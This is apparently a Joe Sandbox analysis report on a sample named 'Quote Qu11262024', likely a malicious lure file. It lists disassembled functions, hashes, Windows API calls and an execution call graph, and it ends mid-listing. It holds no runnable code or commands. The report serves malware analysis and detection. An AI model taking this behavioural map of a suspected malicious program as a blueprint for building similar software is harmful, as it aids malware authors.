                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                    • String ID: 8!B
                                                                                                    • API String ID: 3248276644-3245627493
                                                                                                    • Opcode ID: d7d6070f236b74ec36b6db35c48295ba8123b4cf8f4dede48a8b2afc041c267f
                                                                                                    • Instruction ID: b583f2feeee1fa2a1702995f32b27cb12ce2cea72f891cbc1981f44162e1a7c7
                                                                                                    • Opcode Fuzzy Hash: d7d6070f236b74ec36b6db35c48295ba8123b4cf8f4dede48a8b2afc041c267f
                                                                                                    • Instruction Fuzzy Hash: B3F02821201D6416C622633A1C05DAF7A64CE8332470A023FF8A1B12D2DF3CB853CD6D
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 0040519E
                                                                                                    • CallWindowProcA.USER32(?,?,?,?), ref: 004051EF
                                                                                                      • Part of subcall function 004041BF: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 004041D1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                    • Opcode ID: 2ca1eac7c1195d0005c803efd33f7a405f316611cd2a5b52dbf53bd487dd9cef
                                                                                                    • Instruction ID: 56e5df7b20c1de425db19d69965b58d644de3992e6351093959e1a8ca3dbb386
                                                                                                    • Opcode Fuzzy Hash: 2ca1eac7c1195d0005c803efd33f7a405f316611cd2a5b52dbf53bd487dd9cef
                                                                                                    • Instruction Fuzzy Hash: F9015E31600608ABEB218F51DD84B9B366AEB84754F244537FA007E1D1CB3999929E69
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00405CB0
                                                                                                    • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405CCA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountFileNameTempTick
                                                                                                    • String ID: nsa
                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                    • Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                                                                    • Instruction ID: 9fa101f3d531236a746c1d52dd979526ee055ed374631d61875a7fee21b22c57
                                                                                                    • Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                                                                    • Instruction Fuzzy Hash: 16F082363087086BEB108F55DC04B9B7B98EF91750F14803BFA48DA280D6B599648B58
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 0040579C
                                                                                                    • CloseHandle.KERNEL32(?), ref: 004057A9
                                                                                                    Strings
                                                                                                    • Error launching installer, xrefs: 00405786
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                    • String ID: Error launching installer
                                                                                                    • API String ID: 3712363035-66219284
                                                                                                    • Opcode ID: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                                                                                                    • Instruction ID: 1bb6e64b7b953a3c2aa9907e867e3a15732ced7f05e489ed3edd47c4e295c8eb
                                                                                                    • Opcode Fuzzy Hash: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                                                                                                    • Instruction Fuzzy Hash: 72E046F4600209BFEB109F60EE49F7BBBACEB10704F808421BD00F2190D6B898448A78
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BFA
                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C0B
                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 190613189-0
                                                                                                    • Opcode ID: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                                                                                                    • Instruction ID: c27b470c9fe94f6eecf7a98a2953d165ad92ab49696c0b8e37ec6249d5a40670
                                                                                                    • Opcode Fuzzy Hash: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                                                                                                    • Instruction Fuzzy Hash: 30F0C231208918AFDB129BA4DD4099EBBA8EF46354B2500B9E840FB210D674EE019BA9

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:6.3%
                                                                                                    Dynamic/Decrypted Code Coverage:9.2%
                                                                                                    Signature Coverage:3.2%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:68
                                                                                                    execution_graph 37630 44dea5 37631 44deb5 FreeLibrary 37630->37631 37632 44dec3 37630->37632 37631->37632 37633 4287c1 37634 4287d2 37633->37634 37637 429ac1 37633->37637 37638 428818 37634->37638 37639 42881f 37634->37639 37648 425711 37634->37648 37635 4259da 37696 416760 11 API calls 37635->37696 37667 425ad6 37637->37667 37703 415c56 11 API calls 37637->37703 37670 42013a 37638->37670 37698 420244 97 API calls 37639->37698 37641 4260dd 37697 424251 120 API calls 37641->37697 37644 4259c2 37644->37667 37690 415c56 11 API calls 37644->37690 37648->37635 37648->37637 37648->37644 37651 429a4d 37648->37651 37654 422aeb memset memcpy memcpy 37648->37654 37658 4260a1 37648->37658 37666 425a38 37648->37666 37686 4227f0 memset memcpy 37648->37686 37687 422b84 15 API calls 37648->37687 37688 422b5d memset memcpy memcpy 37648->37688 37689 422640 13 API calls 37648->37689 37691 4241fc 11 API calls 37648->37691 37692 42413a 90 API calls 37648->37692 37652 429a66 37651->37652 37653 429a9b 37651->37653 37699 415c56 11 API calls 37652->37699 37657 429a96 37653->37657 37701 416760 11 API calls 37653->37701 37654->37648 37702 424251 120 API calls 37657->37702 37695 415c56 11 API calls 37658->37695 37660 429a7a 37700 416760 11 API calls 37660->37700 37666->37644 37693 422640 13 API calls 37666->37693 37694 4226e0 12 API calls 37666->37694 37671 42014c 37670->37671 37674 420151 37670->37674 37713 41e466 97 API calls 37671->37713 37673 420162 37673->37648 37674->37673 37675 4201b3 37674->37675 37676 420229 37674->37676 37677 4201b8 37675->37677 37678 4201dc 37675->37678 37676->37673 37679 41fd5e 86 API calls 37676->37679 37704 41fbdb 37677->37704 37678->37673 37682 4201ff 37678->37682 37710 41fc4c 37678->37710 37679->37673 37682->37673 37685 42013a 97 API calls 37682->37685 37685->37673 37686->37648 37687->37648 37688->37648 37689->37648 37690->37635 37691->37648 37692->37648 37693->37666 37694->37666 37695->37635 37696->37641 37697->37667 37698->37648 37699->37660 37700->37657 37701->37657 37702->37637 37703->37635 37705 41fbf1 37704->37705 37706 41fbf8 37704->37706 37709 41fc39 37705->37709 37728 4446ce 11 API calls 37705->37728 37718 41ee26 37706->37718 37709->37673 37714 41fd5e 37709->37714 37711 41ee6b 86 API calls 37710->37711 37712 41fc5d 37711->37712 37712->37678 37713->37674 37715 41fd65 37714->37715 37716 41fdab 37715->37716 37717 41fbdb 86 API calls 37715->37717 37716->37673 37717->37715 37719 41ee41 37718->37719 37720 41ee32 37718->37720 37729 41edad 37719->37729 37732 4446ce 11 API calls 37720->37732 37723 41ee3c 37723->37705 37726 41ee58 37726->37723 37734 41ee6b 37726->37734 37728->37709 37738 41be52 37729->37738 37732->37723 37733 41eb85 11 API calls 37733->37726 37735 41ee70 37734->37735 37736 41ee78 37734->37736 37791 41bf99 86 API calls 37735->37791 37736->37723 37739 41be6f 37738->37739 37740 41be5f 37738->37740 37745 41be8c 37739->37745 37770 418c63 memset memset 37739->37770 37769 4446ce 11 API calls 37740->37769 37742 41be69 37742->37723 37742->37733 37745->37742 37746 41bf3a 37745->37746 37748 41bed1 37745->37748 37750 41bee7 37745->37750 37773 4446ce 11 API calls 37746->37773 37749 41bef0 37748->37749 37752 41bee2 37748->37752 37749->37750 37751 41bf01 37749->37751 37750->37742 37774 41a453 86 API calls 37750->37774 37753 41bf24 memset 37751->37753 37755 41bf14 37751->37755 37771 418a6d memset memcpy memset 37751->37771 37759 41ac13 37752->37759 37753->37742 37772 41a223 memset memcpy memset 37755->37772 37758 41bf20 37758->37753 37760 41ac52 37759->37760 37761 41ac3f memset 37759->37761 37763 41ac6a 37760->37763 37775 41dc14 19 API calls 37760->37775 37766 41acd9 37761->37766 37764 41aca1 37763->37764 37776 41519d 37763->37776 37764->37766 37767 41acc0 memset 37764->37767 37768 41accd memcpy 37764->37768 37766->37750 37767->37766 37768->37766 37769->37742 37770->37745 37771->37755 37772->37758 37773->37750 37775->37763 37779 4175ed 37776->37779 37787 417570 SetFilePointer 37779->37787 37782 41760a ReadFile 37783 417637 37782->37783 37784 417627 GetLastError 37782->37784 37785 4151b3 37783->37785 37786 41763e memset 37783->37786 37784->37785 37785->37764 37786->37785 37788 41759c GetLastError 37787->37788 37790 4175b2 37787->37790 37789 4175a8 GetLastError 37788->37789 37788->37790 37789->37790 37790->37782 37790->37785 37791->37736 37792 417bc5 37793 417c61 37792->37793 37794 417bda 37792->37794 37794->37793 37795 417bf6 UnmapViewOfFile CloseHandle 37794->37795 37797 417c2c 37794->37797 37799 4175b7 37794->37799 37795->37794 37795->37795 37797->37794 37804 41851e 20 API calls 37797->37804 37800 4175d6 CloseHandle 37799->37800 37801 4175c8 37800->37801 37802 4175df 37800->37802 37801->37802 37803 4175ce Sleep 37801->37803 37802->37794 37803->37800 37804->37797 37805 4152c7 malloc 37806 4152ef 37805->37806 37808 4152e2 37805->37808 37809 416760 11 API calls 37806->37809 37809->37808 37810 415308 free 37811 41276d 37812 41277d 37811->37812 37854 4044a4 LoadLibraryW 37812->37854 37814 412785 37815 412789 37814->37815 37862 414b81 37814->37862 37818 4127c8 37868 412465 memset ??2@YAPAXI 37818->37868 37820 4127ea 37880 40ac21 37820->37880 37825 412813 37898 40dd07 memset 37825->37898 37826 412827 37903 40db69 memset 37826->37903 37829 412822 37924 4125b6 ??3@YAXPAX 37829->37924 37831 40ada2 _wcsicmp 37833 41283d 37831->37833 37833->37829 37836 412863 CoInitialize 37833->37836 37908 41268e 37833->37908 37928 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37836->37928 37839 41296f 37930 40b633 37839->37930 37841 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37846 412957 CoUninitialize 37841->37846 37851 4128ca 37841->37851 37846->37829 37847 4128d0 TranslateAcceleratorW 37848 412941 GetMessageW 37847->37848 37847->37851 37848->37846 37848->37847 37849 412909 IsDialogMessageW 37849->37848 37849->37851 37850 4128fd IsDialogMessageW 37850->37848 37850->37849 37851->37847 37851->37849 37851->37850 37852 41292b TranslateMessage DispatchMessageW 37851->37852 37853 41291f IsDialogMessageW 37851->37853 37852->37848 37853->37848 37853->37852 37855 4044f7 37854->37855 37856 4044cf GetProcAddress 37854->37856 37860 404507 MessageBoxW 37855->37860 37861 40451e 37855->37861 37857 4044e8 FreeLibrary 37856->37857 37858 4044df 37856->37858 37857->37855 37859 4044f3 37857->37859 37858->37857 37859->37855 37860->37814 37861->37814 37863 414b8a 37862->37863 37864 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37862->37864 37934 40a804 memset 37863->37934 37864->37818 37867 414b9e GetProcAddress 37867->37864 37869 4124e0 37868->37869 37870 412505 ??2@YAPAXI 37869->37870 37871 41251c 37870->37871 37876 412521 37870->37876 37956 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37871->37956 37945 444722 37876->37945 37879 41259b wcscpy 37879->37820 37961 40b1ab free free 37880->37961 37882 40ad76 37962 40aa04 37882->37962 37885 40a9ce malloc memcpy free free 37888 40ac5c 37885->37888 37886 40ad4b 37886->37882 37985 40a9ce 37886->37985 37888->37882 37888->37885 37888->37886 37889 40ace7 free 37888->37889 37965 40a8d0 37888->37965 37977 4099f4 37888->37977 37889->37888 37893 40a8d0 7 API calls 37893->37882 37894 40ada2 37895 40adc9 37894->37895 37896 40adaa 37894->37896 37895->37825 37895->37826 37896->37895 37897 40adb3 _wcsicmp 37896->37897 37897->37895 37897->37896 37990 40dce0 37898->37990 37900 40dd3a GetModuleHandleW 37995 40dba7 37900->37995 37904 40dce0 3 API calls 37903->37904 37905 40db99 37904->37905 38067 40dae1 37905->38067 38081 402f3a 37908->38081 37910 412766 37910->37829 37910->37836 37911 4126d3 _wcsicmp 37912 4126a8 37911->37912 37912->37910 37912->37911 37914 41270a 37912->37914 38115 4125f8 7 API calls 37912->38115 37914->37910 38084 411ac5 37914->38084 37925 4125da 37924->37925 37926 4125f0 37925->37926 37927 4125e6 DeleteObject 37925->37927 37929 40b1ab free free 37926->37929 37927->37926 37928->37841 37929->37839 37931 40b640 37930->37931 37932 40b639 free 37930->37932 37933 40b1ab free free 37931->37933 37932->37931 37933->37815 37935 40a83b GetSystemDirectoryW 37934->37935 37936 40a84c wcscpy 37934->37936 37935->37936 37941 409719 wcslen 37936->37941 37939 40a881 LoadLibraryW 37940 40a886 37939->37940 37940->37864 37940->37867 37942 409724 37941->37942 37943 409739 wcscat LoadLibraryW 37941->37943 37942->37943 37944 40972c wcscat 37942->37944 37943->37939 37943->37940 37944->37943 37946 444732 37945->37946 37947 444728 DeleteObject 37945->37947 37957 409cc3 37946->37957 37947->37946 37949 412551 37950 4010f9 37949->37950 37951 401130 37950->37951 37952 401134 GetModuleHandleW LoadIconW 37951->37952 37953 401107 wcsncat 37951->37953 37954 40a7be 37952->37954 37953->37951 37955 40a7d2 37954->37955 37955->37879 37955->37955 37956->37876 37960 409bfd memset wcscpy 37957->37960 37959 409cdb CreateFontIndirectW 37959->37949 37960->37959 37961->37888 37963 40aa14 37962->37963 37964 40aa0a free 37962->37964 37963->37894 37964->37963 37966 40a8eb 37965->37966 37967 40a8df wcslen 37965->37967 37968 40a906 free 37966->37968 37969 40a90f 37966->37969 37967->37966 37970 40a919 37968->37970 37971 4099f4 3 API calls 37969->37971 37972 40a932 37970->37972 37973 40a929 free 37970->37973 37971->37970 37975 4099f4 3 API calls 37972->37975 37974 40a93e memcpy 37973->37974 37974->37888 37976 40a93d 37975->37976 37976->37974 37978 409a41 37977->37978 37979 4099fb malloc 37977->37979 37978->37888 37981 409a37 37979->37981 37982 409a1c 37979->37982 37981->37888 37983 409a30 free 37982->37983 37984 409a20 memcpy 37982->37984 37983->37981 37984->37983 37986 40a9e7 37985->37986 37987 40a9dc free 37985->37987 37988 4099f4 3 API calls 37986->37988 37989 40a9f2 37987->37989 37988->37989 37989->37893 38014 409bca GetModuleFileNameW 37990->38014 37992 40dce6 wcsrchr 37993 40dcf5 37992->37993 37994 40dcf9 wcscat 37992->37994 37993->37994 37994->37900 38015 44db70 37995->38015 37999 40dbfd 38018 4447d9 37999->38018 38002 40dc34 wcscpy wcscpy 38044 40d6f5 38002->38044 38003 40dc1f wcscpy 38003->38002 38006 40d6f5 3 API calls 38007 40dc73 38006->38007 38008 40d6f5 3 API calls 38007->38008 38009 40dc89 38008->38009 38010 40d6f5 3 API calls 38009->38010 38011 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38010->38011 38050 40da80 38011->38050 38014->37992 38016 40dbb4 memset memset 38015->38016 38017 409bca GetModuleFileNameW 38016->38017 38017->37999 38019 4447f4 38018->38019 38020 40dc1b 38019->38020 38021 444807 ??2@YAPAXI 38019->38021 38020->38002 38020->38003 38022 44481f 38021->38022 38023 444873 _snwprintf 38022->38023 38024 4448ab wcscpy 38022->38024 38057 44474a 8 API calls 38023->38057 38026 4448bb 38024->38026 38058 44474a 8 API calls 38026->38058 38027 4448a7 38027->38024 38027->38026 38029 4448cd 38059 44474a 8 API calls 38029->38059 38031 4448e2 38060 44474a 8 API calls 38031->38060 38033 4448f7 38061 44474a 8 API calls 38033->38061 38035 44490c 38062 44474a 8 API calls 38035->38062 38037 444921 38063 44474a 8 API calls 38037->38063 38039 444936 38064 44474a 8 API calls 38039->38064 38041 44494b 38065 44474a 8 API calls 38041->38065 38043 444960 ??3@YAXPAX 38043->38020 38045 44db70 38044->38045 38046 40d702 memset GetPrivateProfileStringW 38045->38046 38047 40d752 38046->38047 38048 40d75c WritePrivateProfileStringW 38046->38048 38047->38048 38049 40d758 38047->38049 38048->38049 38049->38006 38051 44db70 38050->38051 38052 40da8d memset 38051->38052 38053 40daac LoadStringW 38052->38053 38056 40dac6 38053->38056 38055 40dade 38055->37829 38056->38053 38056->38055 38066 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38056->38066 38057->38027 38058->38029 38059->38031 38060->38033 38061->38035 38062->38037 38063->38039 38064->38041 38065->38043 38066->38056 38077 409b98 GetFileAttributesW 38067->38077 38069 40daea 38070 40daef wcscpy wcscpy GetPrivateProfileIntW 38069->38070 38076 40db63 38069->38076 38078 40d65d GetPrivateProfileStringW 38070->38078 38072 40db3e 38079 40d65d GetPrivateProfileStringW 38072->38079 38074 40db4f 38080 40d65d GetPrivateProfileStringW 38074->38080 38076->37831 38077->38069 38078->38072 38079->38074 38080->38076 38116 40eaff 38081->38116 38085 411ae2 memset 38084->38085 38086 411b8f 38084->38086 38156 409bca GetModuleFileNameW 38085->38156 38098 411a8b 38086->38098 38088 411b0a wcsrchr 38089 411b22 wcscat 38088->38089 38090 411b1f 38088->38090 38157 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38089->38157 38090->38089 38092 411b67 38158 402afb 38092->38158 38096 411b7f 38214 40ea13 SendMessageW memset SendMessageW 38096->38214 38099 402afb 27 API calls 38098->38099 38100 411ac0 38099->38100 38101 4110dc 38100->38101 38102 41113e 38101->38102 38107 4110f0 38101->38107 38239 40969c LoadCursorW SetCursor 38102->38239 38104 411143 38240 4032b4 38104->38240 38258 444a54 38104->38258 38105 4110f7 _wcsicmp 38105->38107 38106 411157 38108 40ada2 _wcsicmp 38106->38108 38107->38102 38107->38105 38261 410c46 10 API calls 38107->38261 38111 411167 38108->38111 38109 4111af 38111->38109 38112 4111a6 qsort 38111->38112 38112->38109 38115->37912 38117 40eb10 38116->38117 38129 40e8e0 38117->38129 38120 40eb6c memcpy memcpy 38121 40ebb7 38120->38121 38121->38120 38122 40ebf2 ??2@YAPAXI ??2@YAPAXI 38121->38122 38124 40d134 16 API calls 38121->38124 38123 40ec65 38122->38123 38125 40ec2e ??2@YAPAXI 38122->38125 38139 40ea7f 38123->38139 38124->38121 38125->38123 38128 402f49 38128->37912 38130 40e8f2 38129->38130 38131 40e8eb ??3@YAXPAX 38129->38131 38132 40e900 38130->38132 38133 40e8f9 ??3@YAXPAX 38130->38133 38131->38130 38134 40e911 38132->38134 38135 40e90a ??3@YAXPAX 38132->38135 38133->38132 38136 40e931 ??2@YAPAXI ??2@YAPAXI 38134->38136 38137 40e921 ??3@YAXPAX 38134->38137 38138 40e92a ??3@YAXPAX 38134->38138 38135->38134 38136->38120 38137->38138 38138->38136 38140 40aa04 free 38139->38140 38141 40ea88 38140->38141 38142 40aa04 free 38141->38142 38143 40ea90 38142->38143 38144 40aa04 free 38143->38144 38145 40ea98 38144->38145 38146 40aa04 free 38145->38146 38147 40eaa0 38146->38147 38148 40a9ce 4 API calls 38147->38148 38149 40eab3 38148->38149 38150 40a9ce 4 API calls 38149->38150 38151 40eabd 38150->38151 38152 40a9ce 4 API calls 38151->38152 38153 40eac7 38152->38153 38154 40a9ce 4 API calls 38153->38154 38155 40ead1 38154->38155 38155->38128 38156->38088 38157->38092 38215 40b2cc 38158->38215 38160 402b0a 38161 40b2cc 27 API calls 38160->38161 38162 402b23 38161->38162 38163 40b2cc 27 API calls 38162->38163 38164 402b3a 38163->38164 38165 40b2cc 27 API calls 38164->38165 38166 402b54 38165->38166 38167 40b2cc 27 API calls 38166->38167 38168 402b6b 38167->38168 38169 40b2cc 27 API calls 38168->38169 38170 402b82 38169->38170 38171 40b2cc 27 API calls 38170->38171 38172 402b99 38171->38172 38173 40b2cc 27 API calls 38172->38173 38174 402bb0 38173->38174 38175 40b2cc 27 API calls 38174->38175 38176 402bc7 38175->38176 38177 40b2cc 27 API calls 38176->38177 38178 402bde 38177->38178 38179 40b2cc 27 API calls 38178->38179 38180 402bf5 38179->38180 38181 40b2cc 27 API calls 38180->38181 38182 402c0c 38181->38182 38183 40b2cc 27 API calls 38182->38183 38184 402c23 38183->38184 38185 40b2cc 27 API calls 38184->38185 38186 402c3a 38185->38186 38187 40b2cc 27 API calls 38186->38187 38188 402c51 38187->38188 38189 40b2cc 27 API calls 38188->38189 38190 402c68 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402c7f 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402c99 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402cb3 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402cd5 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402cf0 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402d0b 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402d26 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402d3e 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402d59 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402d78 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402d93 38211->38212 38213 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38212->38213 38213->38096 38214->38086 38218 40b58d 38215->38218 38217 40b2d1 38217->38160 38219 40b5a4 GetModuleHandleW FindResourceW 38218->38219 38220 40b62e 38218->38220 38221 40b5c2 LoadResource 38219->38221 38223 40b5e7 38219->38223 38220->38217 38222 40b5d0 SizeofResource LockResource 38221->38222 38221->38223 38222->38223 38223->38220 38231 40afcf 38223->38231 38225 40b608 memcpy 38234 40b4d3 memcpy 38225->38234 38227 40b61e 38235 40b3c1 18 API calls 38227->38235 38229 40b626 38236 40b04b 38229->38236 38232 40b04b ??3@YAXPAX 38231->38232 38233 40afd7 ??2@YAPAXI 38232->38233 38233->38225 38234->38227 38235->38229 38237 40b051 ??3@YAXPAX 38236->38237 38238 40b05f 38236->38238 38237->38238 38238->38220 38239->38104 38241 4032c4 38240->38241 38242 40b633 free 38241->38242 38243 403316 38242->38243 38262 44553b 38243->38262 38247 403480 38460 40368c 15 API calls 38247->38460 38249 403489 38250 40b633 free 38249->38250 38252 403495 38250->38252 38251 40333c 38251->38247 38253 4033a9 memset memcpy 38251->38253 38254 4033ec wcscmp 38251->38254 38458 4028e7 11 API calls 38251->38458 38459 40f508 6 API calls 38251->38459 38252->38106 38253->38251 38253->38254 38254->38251 38257 403421 _wcsicmp 38257->38251 38259 444a64 FreeLibrary 38258->38259 38260 444a83 38258->38260 38259->38260 38260->38106 38261->38107 38263 445548 38262->38263 38264 445599 38263->38264 38461 40c768 38263->38461 38265 4455a8 memset 38264->38265 38272 4457f2 38264->38272 38544 403988 38265->38544 38275 445854 38272->38275 38646 403e2d memset memset memset memset memset 38272->38646 38273 4455e5 38284 445672 38273->38284 38289 44560f 38273->38289 38274 4458bb memset memset 38277 414c2e 17 API calls 38274->38277 38328 4458aa 38275->38328 38669 403c9c memset memset memset memset memset 38275->38669 38280 4458f9 38277->38280 38279 44595e memset memset 38287 414c2e 17 API calls 38279->38287 38288 40b2cc 27 API calls 38280->38288 38282 44558c 38528 444b06 38282->38528 38283 44557a 38283->38282 38742 4136c0 CoTaskMemFree 38283->38742 38555 403fbe memset memset memset memset memset 38284->38555 38285 445a00 memset memset 38692 414c2e 38285->38692 38286 445b22 38292 445bca 38286->38292 38293 445b38 memset memset memset 38286->38293 38297 44599c 38287->38297 38299 445909 38288->38299 38301 4087b3 338 API calls 38289->38301 38291 445849 38758 40b1ab free free 38291->38758 38300 445c8b memset memset 38292->38300 38366 445cf0 38292->38366 38304 445bd4 38293->38304 38305 445b98 38293->38305 38298 40b2cc 27 API calls 38297->38298 38312 4459ac 38298->38312 38309 409d1f 6 API calls 38299->38309 38313 414c2e 17 API calls 38300->38313 38310 445621 38301->38310 38302 44589f 38759 40b1ab free free 38302->38759 38303 445585 38319 414c2e 17 API calls 38304->38319 38305->38304 38315 445ba2 38305->38315 38308 403335 38457 4452e5 45 API calls 38308->38457 38323 445919 38309->38323 38744 4454bf 20 API calls 38310->38744 38311 445823 38311->38291 38333 4087b3 338 API calls 38311->38333 38324 409d1f 6 API calls 38312->38324 38325 445cc9 38313->38325 38831 4099c6 wcslen 38315->38831 38316 4456b2 38746 40b1ab free free 38316->38746 38318 40b2cc 27 API calls 38329 445a4f 38318->38329 38320 445be2 38319->38320 38331 40b2cc 27 API calls 38320->38331 38321 445d3d 38351 40b2cc 27 API calls 38321->38351 38322 445d88 memset memset memset 38334 414c2e 17 API calls 38322->38334 38760 409b98 GetFileAttributesW 38323->38760 38335 4459bc 38324->38335 38336 409d1f 6 API calls 38325->38336 38326 445879 38326->38302 38347 4087b3 338 API calls 38326->38347 38328->38274 38352 44594a 38328->38352 38708 409d1f wcslen wcslen 38329->38708 38341 445bf3 38331->38341 38333->38311 38344 445dde 38334->38344 38827 409b98 GetFileAttributesW 38335->38827 38346 445ce1 38336->38346 38337 445bb3 38834 445403 memset 38337->38834 38338 445680 38338->38316 38578 4087b3 memset 38338->38578 38350 409d1f 6 API calls 38341->38350 38342 445928 38342->38352 38761 40b6ef 38342->38761 38353 40b2cc 27 API calls 38344->38353 38851 409b98 GetFileAttributesW 38346->38851 38347->38326 38349 40b2cc 27 API calls 38358 445a94 38349->38358 38360 445c07 38350->38360 38361 445d54 _wcsicmp 38351->38361 38352->38279 38365 4459ed 38352->38365 38364 445def 38353->38364 38354 